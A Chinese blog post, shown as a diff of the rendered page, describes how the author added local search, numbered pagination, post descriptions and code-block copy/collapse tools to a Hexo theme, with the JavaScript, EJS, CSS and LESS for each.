    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
    var match_content = content.substr(start, end);
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
    return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~<span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
    // only match artiles with not empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
    var match_content = content.substr(start, end);
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
    return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~<span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }

    ​ 大致意思就是读取输入框 search_id 里的内容,从 path./search.xml)检索内容,将检索到的内容和计数分别以列表形式追加到 content_idmatch_count_id 中。

    前端

    search.ejs

    ​ OK,后端就是这样,接下来写前端 search.ejs

    -
    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
    <hr></hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
    </div>
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
    <hr></hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
    </div>

    search.css

    search.css 设计一下布局:

    -
    .page-header{
    display: flex;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
    padding: 0 10px 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    .page-header{
    display: flex;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
    padding: 0 10px 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }

    部署

    index.less 导入 css:

    -
    @import "./plugin/search.css";
    +
    1
    @import "./plugin/search.css";

    ​ 我把这个搜索模块放到了统计页面下 grouping 前,看起来还不错,然后设置一个开关控制这个功能是否启用。

    -
    <% if(theme.search && is_archive()) { %>
    <%- partial('_widget/search') %>
    <% } %>
    +
    1
    2
    3
    <% if(theme.search && is_archive()) { %>
    <%- partial('_widget/search') %>
    <% } %>

    演示

    ​ 本地是秒出结果的,部署上去的话会比较卡,乱输的话还会崩溃 emmm 手机试了下没加载成功……果然还是 bb 太多了。

    png

    @@ -515,10 +513,10 @@

    方法论

    代码

    home.ejs

    ​ 修改 home.ejs

    -
    <div class="change-page">
    <div class="change-page">
    <% if(page.prev !==0 && theme.pagination !== 1){ // 前一页 %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
    <a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %> %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    <div class="change-page">
    <div class="change-page">
    <% if(page.prev !==0 && theme.pagination !== 1){ // 前一页 %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
    <a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %> %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>

    home.less

    ​ 再调整 home.less

    -
    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }

    演示

    png

    ​ 现在翻页不仅可以翻到上一页和下一页,还可以翻到首页、尾页以及周围的页数。如果周围的页数与首页和尾页不连续,添加省略号。

    @@ -530,10 +528,10 @@

    代码

    home.ejs

    home.ejs 中找到 post-block-content-info,加上显示 post.description 的代码:

    -
    <span class="post-block-content-info-description">
    <%= post.description %>
    </span>
    +
    1
    2
    3
    <span class="post-block-content-info-description">
    <%= post.description %>
    </span>

    home.less

    home.less 修改样式:

    -
    .post-card-description {
    padding: 10px 16px;
    text-align: right;
    flex-grow: 1;
    font-size: 14px;
    font-weight: 500;
    line-height: 36px;
    color: #999;
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    .post-card-description {
    padding: 10px 16px;
    text-align: right;
    flex-grow: 1;
    font-size: 14px;
    font-weight: 500;
    line-height: 36px;
    color: #999;
    }

    演示

    ​ 最终演示:

    png

    @@ -550,10 +548,10 @@

    highlight_to

    感觉这么写代码有点不规范,先这样吧!

    -
    <%- js('js/widget/highlight_tools.js') %>
    <script>
    var codeBlocks = document.querySelectorAll('pre');
    createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // 调用函数并传递参数
    </script>
    +
    1
    2
    3
    4
    5
    <%- js('js/widget/highlight_tools.js') %>
    <script>
    var codeBlocks = document.querySelectorAll('pre');
    createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // 调用函数并传递参数
    </script>

    highlight_tools.js

    function createHighlightTools()
    -
    function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
    codeBlocks.forEach(function (codeBlock) {
    if (!codeBlock.querySelector('code'))
    return;
    var container = createContainer(codeBlock);
    createCopyButton(container, codeBlock, copyIcon);
    createCodeLangText(container, codeBlock);
    createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
    setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
    });
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
    codeBlocks.forEach(function (codeBlock) {
    if (!codeBlock.querySelector('code'))
    return;
    var container = createContainer(codeBlock);
    createCopyButton(container, codeBlock, copyIcon);
    createCodeLangText(container, codeBlock);
    createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
    setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
    });
    }

    ​ 先找找这个 <pre> 有没有 <code> 这个子元素,防止误判。

    • createContainer() 给代码块顶端包一层,用于放置 UI。
    • @@ -565,7 +563,7 @@
      function createContainer()
      -
      function createContainer(codeBlock) {
      // 创建包裹代码块和按钮的容器元素
      var container = document.createElement('div');
      container.className = 'hightlight-tools';
      // 将容器元素插入到代码块之前
      codeBlock.parentNode.insertBefore(container, codeBlock);
      return container;
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      function createContainer(codeBlock) {
      // 创建包裹代码块和按钮的容器元素
      var container = document.createElement('div');
      container.className = 'hightlight-tools';
      // 将容器元素插入到代码块之前
      codeBlock.parentNode.insertBefore(container, codeBlock);
      return container;
      }

      ​ 这样,在代码块上方就会多一个 <div class="highlight_tools">

      png

      function createCopyButton()
      @@ -573,21 +571,21 @@
      添加 CopyCode(复制代码)功能-腾讯云开发者社区-腾讯云 (tencent.com)
    -
    function createCopyButton(container, codeBlock, icon) {
    var button = document.createElement('button');
    button.className = 'copy-button';
    button.type = 'button';
    button.title = 'copy-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = "已复制";
    // 添加类名
    span.className = 'copy-notice';
    // 将文字添加到容器元素内
    container.appendChild(span);

    button.addEventListener('click', function () {
    // 获取代码块的文本内容,包括换行符
    var code = codeBlock.innerText;
    // 创建一个临时的 textarea 元素,并将代码块的内容设置为其值
    var textarea = document.createElement('textarea');
    textarea.value = code;
    // 将 textarea 元素追加到 body 中
    document.body.appendChild(textarea);
    // 选中 textarea 中的文本
    textarea.select();
    // 执行复制操作
    document.execCommand('copy');
    // 移除临时的 textarea 元素
    document.body.removeChild(textarea);
    // 已复制
    span.style.opacity = 1;
    // 2 秒后将目标元素的透明度设置为 0
    setTimeout(function () {
    span.style.opacity = 0;
    }, 1000);
    });
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    function createCopyButton(container, codeBlock, icon) {
    var button = document.createElement('button');
    button.className = 'copy-button';
    button.type = 'button';
    button.title = 'copy-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = "已复制";
    // 添加类名
    span.className = 'copy-notice';
    // 将文字添加到容器元素内
    container.appendChild(span);

    button.addEventListener('click', function () {
    // 获取代码块的文本内容,包括换行符
    var code = codeBlock.innerText;
    // 创建一个临时的 textarea 元素,并将代码块的内容设置为其值
    var textarea = document.createElement('textarea');
    textarea.value = code;
    // 将 textarea 元素追加到 body 中
    document.body.appendChild(textarea);
    // 选中 textarea 中的文本
    textarea.select();
    // 执行复制操作
    document.execCommand('copy');
    // 移除临时的 textarea 元素
    document.body.removeChild(textarea);
    // 已复制
    span.style.opacity = 1;
    // 2 秒后将目标元素的透明度设置为 0
    setTimeout(function () {
    span.style.opacity = 0;
    }, 1000);
    });
    }

    ​ 原文中获取代码内容的代码为 var code = codeBlock.textContent; 这么做会舍弃换行符,应改为 var code = codeBlock.innerText;

    ​ 同时加上”已复制“的提示文本。

    function createCodeLangText()
    -
    function createCodeLangText(container, codeBlock) {
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // 代码语言
    if (span.textContent === 'EBNF')
    span.textContent = '';
    // 添加类名
    span.className = 'code-lang';
    // 将文字添加到容器元素内
    container.appendChild(span);
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    function createCodeLangText(container, codeBlock) {
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // 代码语言
    if (span.textContent === 'EBNF')
    span.textContent = '';
    // 添加类名
    span.className = 'code-lang';
    // 将文字添加到容器元素内
    container.appendChild(span);
    }

    ​ 获取 hljs 类中另一个类的名称,即为代码语言。如果 markdown 中没有设置代码语言,会渲染成 ebnf 类,把它替换为空。

    function createCloseCodeBlockButton()
    -
    function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
    {
    var button = document.createElement('button');
    button.className = 'close-code-block-button';
    button.type = 'button';
    button.title = 'close-code-block-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    if(Boolean(highlight_shrink))
    {
    var hljs = codeBlock.querySelector('.hljs');
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }
    button.addEventListener('click', function () {
    var hljs = codeBlock.querySelector('.hljs');
    if (!hljs.classList.contains('closed')) {
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }else{
    button.style.transform = "rotate(0deg)";
    hljs.classList.remove("closed");
    }
    });
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
    {
    var button = document.createElement('button');
    button.className = 'close-code-block-button';
    button.type = 'button';
    button.title = 'close-code-block-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    if(Boolean(highlight_shrink))
    {
    var hljs = codeBlock.querySelector('.hljs');
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }
    button.addEventListener('click', function () {
    var hljs = codeBlock.querySelector('.hljs');
    if (!hljs.classList.contains('closed')) {
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }else{
    button.style.transform = "rotate(0deg)";
    hljs.classList.remove("closed");
    }
    });
    }

    ​ 获取 hljs类,给它加一个 closed类,剩余的逻辑交给 css 吧。

    ​ 文章新增参数 highlight_shrink,如果为 true,默认代码块就是关闭的。

    function setHighlightHeightLimit()
    -
    function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
    {
    // 限制代码块最大长度
    if (HighlightHeightLimit != "")
    {
    var hljs = codeBlock.querySelector('.hljs');
    hljs.style.maxHeight = HighlightHeightLimit;
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
    {
    // 限制代码块最大长度
    if (HighlightHeightLimit != "")
    {
    var hljs = codeBlock.querySelector('.hljs');
    hljs.style.maxHeight = HighlightHeightLimit;
    }
    }

    ​ 控制代码块最大长度。这个值由 page.highlight_height_limit 控制。

    highlight_tools.css

    -
    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
